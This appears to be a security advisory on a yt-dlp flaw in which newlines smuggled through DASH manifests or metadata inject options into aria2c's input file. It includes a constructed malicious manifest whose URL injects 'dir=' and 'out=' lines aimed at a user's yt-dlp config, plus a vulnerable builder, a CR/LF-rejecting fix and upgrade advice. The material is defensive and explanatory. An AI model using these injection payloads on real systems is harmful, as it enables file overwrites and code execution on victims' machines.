yt-dlp arbitrary file write via aria2c in fragmented manifests
What changed
yt-dlp versions prior to 2026.06.09 allow arbitrary file write via aria2c when downloading fragmented manifests (HLS/DASH). The fragment URLs and output filenames are written into the aria2c input file, and an attacker can inject their own aria2c options into that file either through a malicious DASH manifest (smuggling a line break as an HTML/XML newline escape, which the parser decodes into a real newline) or through metadata fields that contain newlines (only if '--no-windows-filename' is used, since the default filename sanitization strips them). On Windows, this can lead to immediate arbitrary code execution; on all platforms, it can lead to code execution on the next yt-dlp invocation by writing a malicious config file.
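The following is an added example, not yt-dlp's code and not the exact file yt-dlp writes; it models the injection described above against aria2c's documented input-file format (one URI per line, followed by indented key=value option lines such as 'dir=' and 'out=' that apply to that URI). The manifest, URLs, paths and function names are constructed for this example. It shows both vectors from the advisory: a DASH BaseURL carrying '&#10;' escapes, and a metadata-derived filename that already contains a newline, and the check that refuses such values before the file is written.

```python
"""Added example (not yt-dlp's own code): newline injection into an aria2c
input file from a DASH manifest or from a metadata-derived filename."""
import xml.etree.ElementTree as ET

MPD_NS = {"mpd": "urn:mpeg:dash:schema:mpd:2011"}

# Constructed manifest for this example. The segment URL smuggles line breaks
# as the numeric character reference &#10; (LF). The XML parser decodes each
# one into a real newline, so the single "URL" becomes four lines of aria2c
# input: the real segment, an injected dir=/out= pair aimed at a (constructed)
# yt-dlp config location, and a second URI line that absorbs the legitimate
# out= line the downloader appends afterwards.
MALICIOUS_MPD = """<MPD xmlns="urn:mpeg:dash:schema:mpd:2011">
  <Period>
    <AdaptationSet>
      <Representation id="v1">
        <BaseURL>https://cdn.example.invalid/seg1.m4s&#10; dir=/home/victim/.config/yt-dlp&#10; out=config&#10;https://cdn.example.invalid/seg1.m4s</BaseURL>
      </Representation>
    </AdaptationSet>
  </Period>
</MPD>
"""


def fragment_urls(mpd_text: str) -> list[str]:
    """Collect every BaseURL value from the manifest, as a downloader would."""
    root = ET.fromstring(mpd_text)
    return [(el.text or "") for el in root.iterfind(".//mpd:BaseURL", MPD_NS)]


def build_input_file_unsafe(urls: list[str], out_name: str) -> str:
    """Vulnerable pattern: untrusted URL and filename written verbatim.

    Format is aria2c's --input-file: a URI line, then indented key=value
    option lines that apply to it (dir= and out= are both accepted there).
    """
    lines = []
    for i, url in enumerate(urls):
        lines.append(url)
        lines.append(f" out={out_name}.frag{i}")
    return "\n".join(lines) + "\n"


def build_input_file_safe(urls: list[str], out_name: str) -> str:
    """Hardened: a value containing CR or LF can never be one URI or one
    filename, so refuse it before anything reaches the input file."""
    for value in [*urls, out_name]:
        if "\n" in value or "\r" in value:
            raise ValueError(f"control character in aria2c input value: {value!r}")
    return build_input_file_unsafe(urls, out_name)


def parse_input_file(text: str) -> list[dict]:
    """Read the file back the way aria2c does: a line without leading
    whitespace starts a new download, indented lines are its options."""
    entries: list[dict] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0] in " \t":
            if not entries:
                raise ValueError("option line before any URI")
            key, _, value = line.strip().partition("=")
            entries[-1]["options"][key] = value
        else:
            entries.append({"uri": line, "options": {}})
    return entries


def demo() -> list[dict]:
    """Manifest vector: what aria2c would see from the vulnerable builder."""
    return parse_input_file(build_input_file_unsafe(fragment_urls(MALICIOUS_MPD), "video"))


if __name__ == "__main__":
    for entry in demo():
        print(entry["uri"], entry["options"])
    try:
        build_input_file_safe(fragment_urls(MALICIOUS_MPD), "video")
    except ValueError as exc:
        print("rejected:", exc)
```

Parsing the unsafe file shows the first download carrying the attacker's 'dir' and 'out' options, which is the file-write primitive the advisory describes; the 'out=video.frag0' the downloader intended is attached to the injected second URI instead. The same check in build_input_file_safe covers the metadata vector, because a title such as 'video\n dir=/tmp/evil' injects in exactly the same way once it is placed on the 'out=' line.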
Who it affects
Users of yt-dlp who run aria2c as an external downloader for HLS/DASH streams (for example via '--downloader aria2c'). Downloads that use yt-dlp's native downloader for these protocols are not affected.
What to do today
Upgrade to yt-dlp version 2026.06.09 or later; 'yt-dlp --version' shows the installed version. If unable to upgrade, add '--downloader dash,m3u8:native' to your command so that fragmented DASH and HLS downloads use the native downloader and aria2c is never invoked for them.